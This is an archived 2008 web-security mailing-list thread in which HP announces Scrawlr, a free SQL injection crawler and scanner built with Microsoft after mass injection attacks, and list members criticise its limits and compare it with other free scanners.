[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

OK - then don't use it. Those folks who run SQL-based web applications who aren't savvy enough to use advanced penetration testing tools like you will find Scrawlr very handy in identifying the "low-hanging fruit" out there for exploitation. If you've kept up on the news the advisory Microsoft is issuing deals with the Google search-based automated exploit tool that attacks classic ASP and SQL database-driven sites and infests them with various malware, etc... it's a big enough problem that Microsoft went out of their way to issue a big advisory and is offering *free* assistance.

For the record, I work in the same "Application Security Center [ASC]" group at HP as Billy...

__
Rafal M. Los
IT Security - Response | Mitigation | Strategy

E-mail:  rafal@xxxxxxxxxxxxxxxx
Direct:  +1 (404) 606-6056
- gPGP:    0xFFC63B33
- Blog:    http://preachsecurity.blogspot.com
- Web:     http://www.ishackingyou.com
- LinkedIn:http://www.linkedin.com/in/rmlos

--------------------------------------------------
From: "Michael S. Menefee" <mmenefee@xxxxxxxxxxxxxxx>
Sent: Tuesday, June 24, 2008 9:07 PM
To: "Bryan Sullivan" <bryansul@xxxxxxxxxxxxx>; "Zinho" <zinho@xxxxxxxxxxxxxxxxx>; <websecurity@xxxxxxxxxxxxx>
Subject: RE: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

Well if it does not account for form variables, then it doesn't really
account for much.....




-----Original Message-----
From: Bryan Sullivan [mailto:bryansul@xxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 8:23 PM
To: Zinho; websecurity@xxxxxxxxxxxxx
Subject: RE: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

No, it definitely does check for blind SQLi. Are your test pages
vulnerable through form inputs? As Billy said earlier, Scrawlr does not
submit forms.

-----Original Message-----
From: Zinho [mailto:zinho@xxxxxxxxxxxxxxxxx]
Sent: Tuesday, June 24, 2008 5:04 PM
To: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

I have to agree with  Michael. I tested it on both simple ASP and PHP
pages with a clear sql injection. Nothing. The tool doesn't even seem to
check for blind sqli.
I think it merely gets the server's response and looks for known SQL
errors. Not mentioning the limited crawling capabilities.
I would have expected something more from HP/MS. Free tools around do a
much better job.

http://www.hackerscenter.com/index.php?/Blogs/2819-HP-and-MS-give-us-a-n
ew-SQL-Injection-tool.html


----
Armando Romeo

Webmaster and Founder

Hackers Center
Internet Security Portal
www.hackerscenter.com



Michael S. Menefee ha scritto: 
Billy,

Although this is indeed a good step, there are already a plethora of
"free" sql injection scanners or exploiters that kick the crap out of
this tool.

However, I am extremely excited to see this kind of development in the
commercial space, and would like to see some enhancements to this
product. Now, if HPs goal is to push their commercial tools ($$$) by
pushing a limited "free" version, then I suppose none of this will
ever
happen, but *at a minimum* it would be nice to be able to either
modify 
headers or input credentials where public sites are not the target.

I tested this on 3 sites I knew to be vulnerable to SQL injection (all
ASP.NET, MSSQL), but either cookies or authentication were required to
actually test in these case, hence nothing was discovered with this
tool(lame).

There's nothing worse than a free version of a product designed
exclusively for you to be left "wanting" and thinking about purchasing
the commercial version.

If there are unseen or hidden options to this tool, forgive me,
otherwise I don't really see the value when so many better free tools
exist (Pangolin, Absinthe, Magic, Power Injector, etc, etc, etc)








-----Original Message-----
From: Hoffman, Billy [mailto:billy.hoffman@xxxxxx]
Sent: Tuesday, June 24, 2008 5:35 PM
To: websecurity@xxxxxxxxxxxxx
Subject: [WEB SECURITY] Announcing Scrawlr: SQL Injector and Crawler

In response to all the Mass SQL Injection attacks this year, Microsoft
approached HP and the Web Security Research Group (formerly SPI Labs)
for assistance. While there was nothing they could patch, Microsoft
wanted to provide tools to help developers find and fix these issues.
After a month of development HP created Scrawlr.

Scrawlr (short for SQL Injector and Crawler) is a free tool that will
crawl a website while simultaneously analyzing the parameters of each
individual web page for SQL Injection vulnerabilities. Scrawlr was
designed specifically to help protect against these mass injection
attack which are using Google queries to find older web applications
and
automatically injection them. As such, Scrawlr crawls a websites
using
the same techniques as a search engine: it doesn't keep state, or
submit 
forms, or execute JavaScript or Flash. This Scrawl is finding and
auditing the pages that would have been indexed by the search engines.

To reduce false positives Scrawlr provides proof of the vulnerability
results by displaying the type of backend database in use and a list
of
available table names. There is no denying you have SQL Injection when
I 
can show you table names!

Microsoft Announcement here:
http://www.microsoft.com/technet/security/advisory/954462.mspx
HP WSRG Blog:

http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/200 
8/06/23/finding-sql-injection-with-scrawlr.aspx
Download here: https://download.spidynamics.com/Products/scrawlr/

Enjoy,
Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069



------------------------------------------------------------------------ 
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA




------------------------------------------------------------------------
----

Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA






------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Brought to you by http://www.webappsec.org
Search this site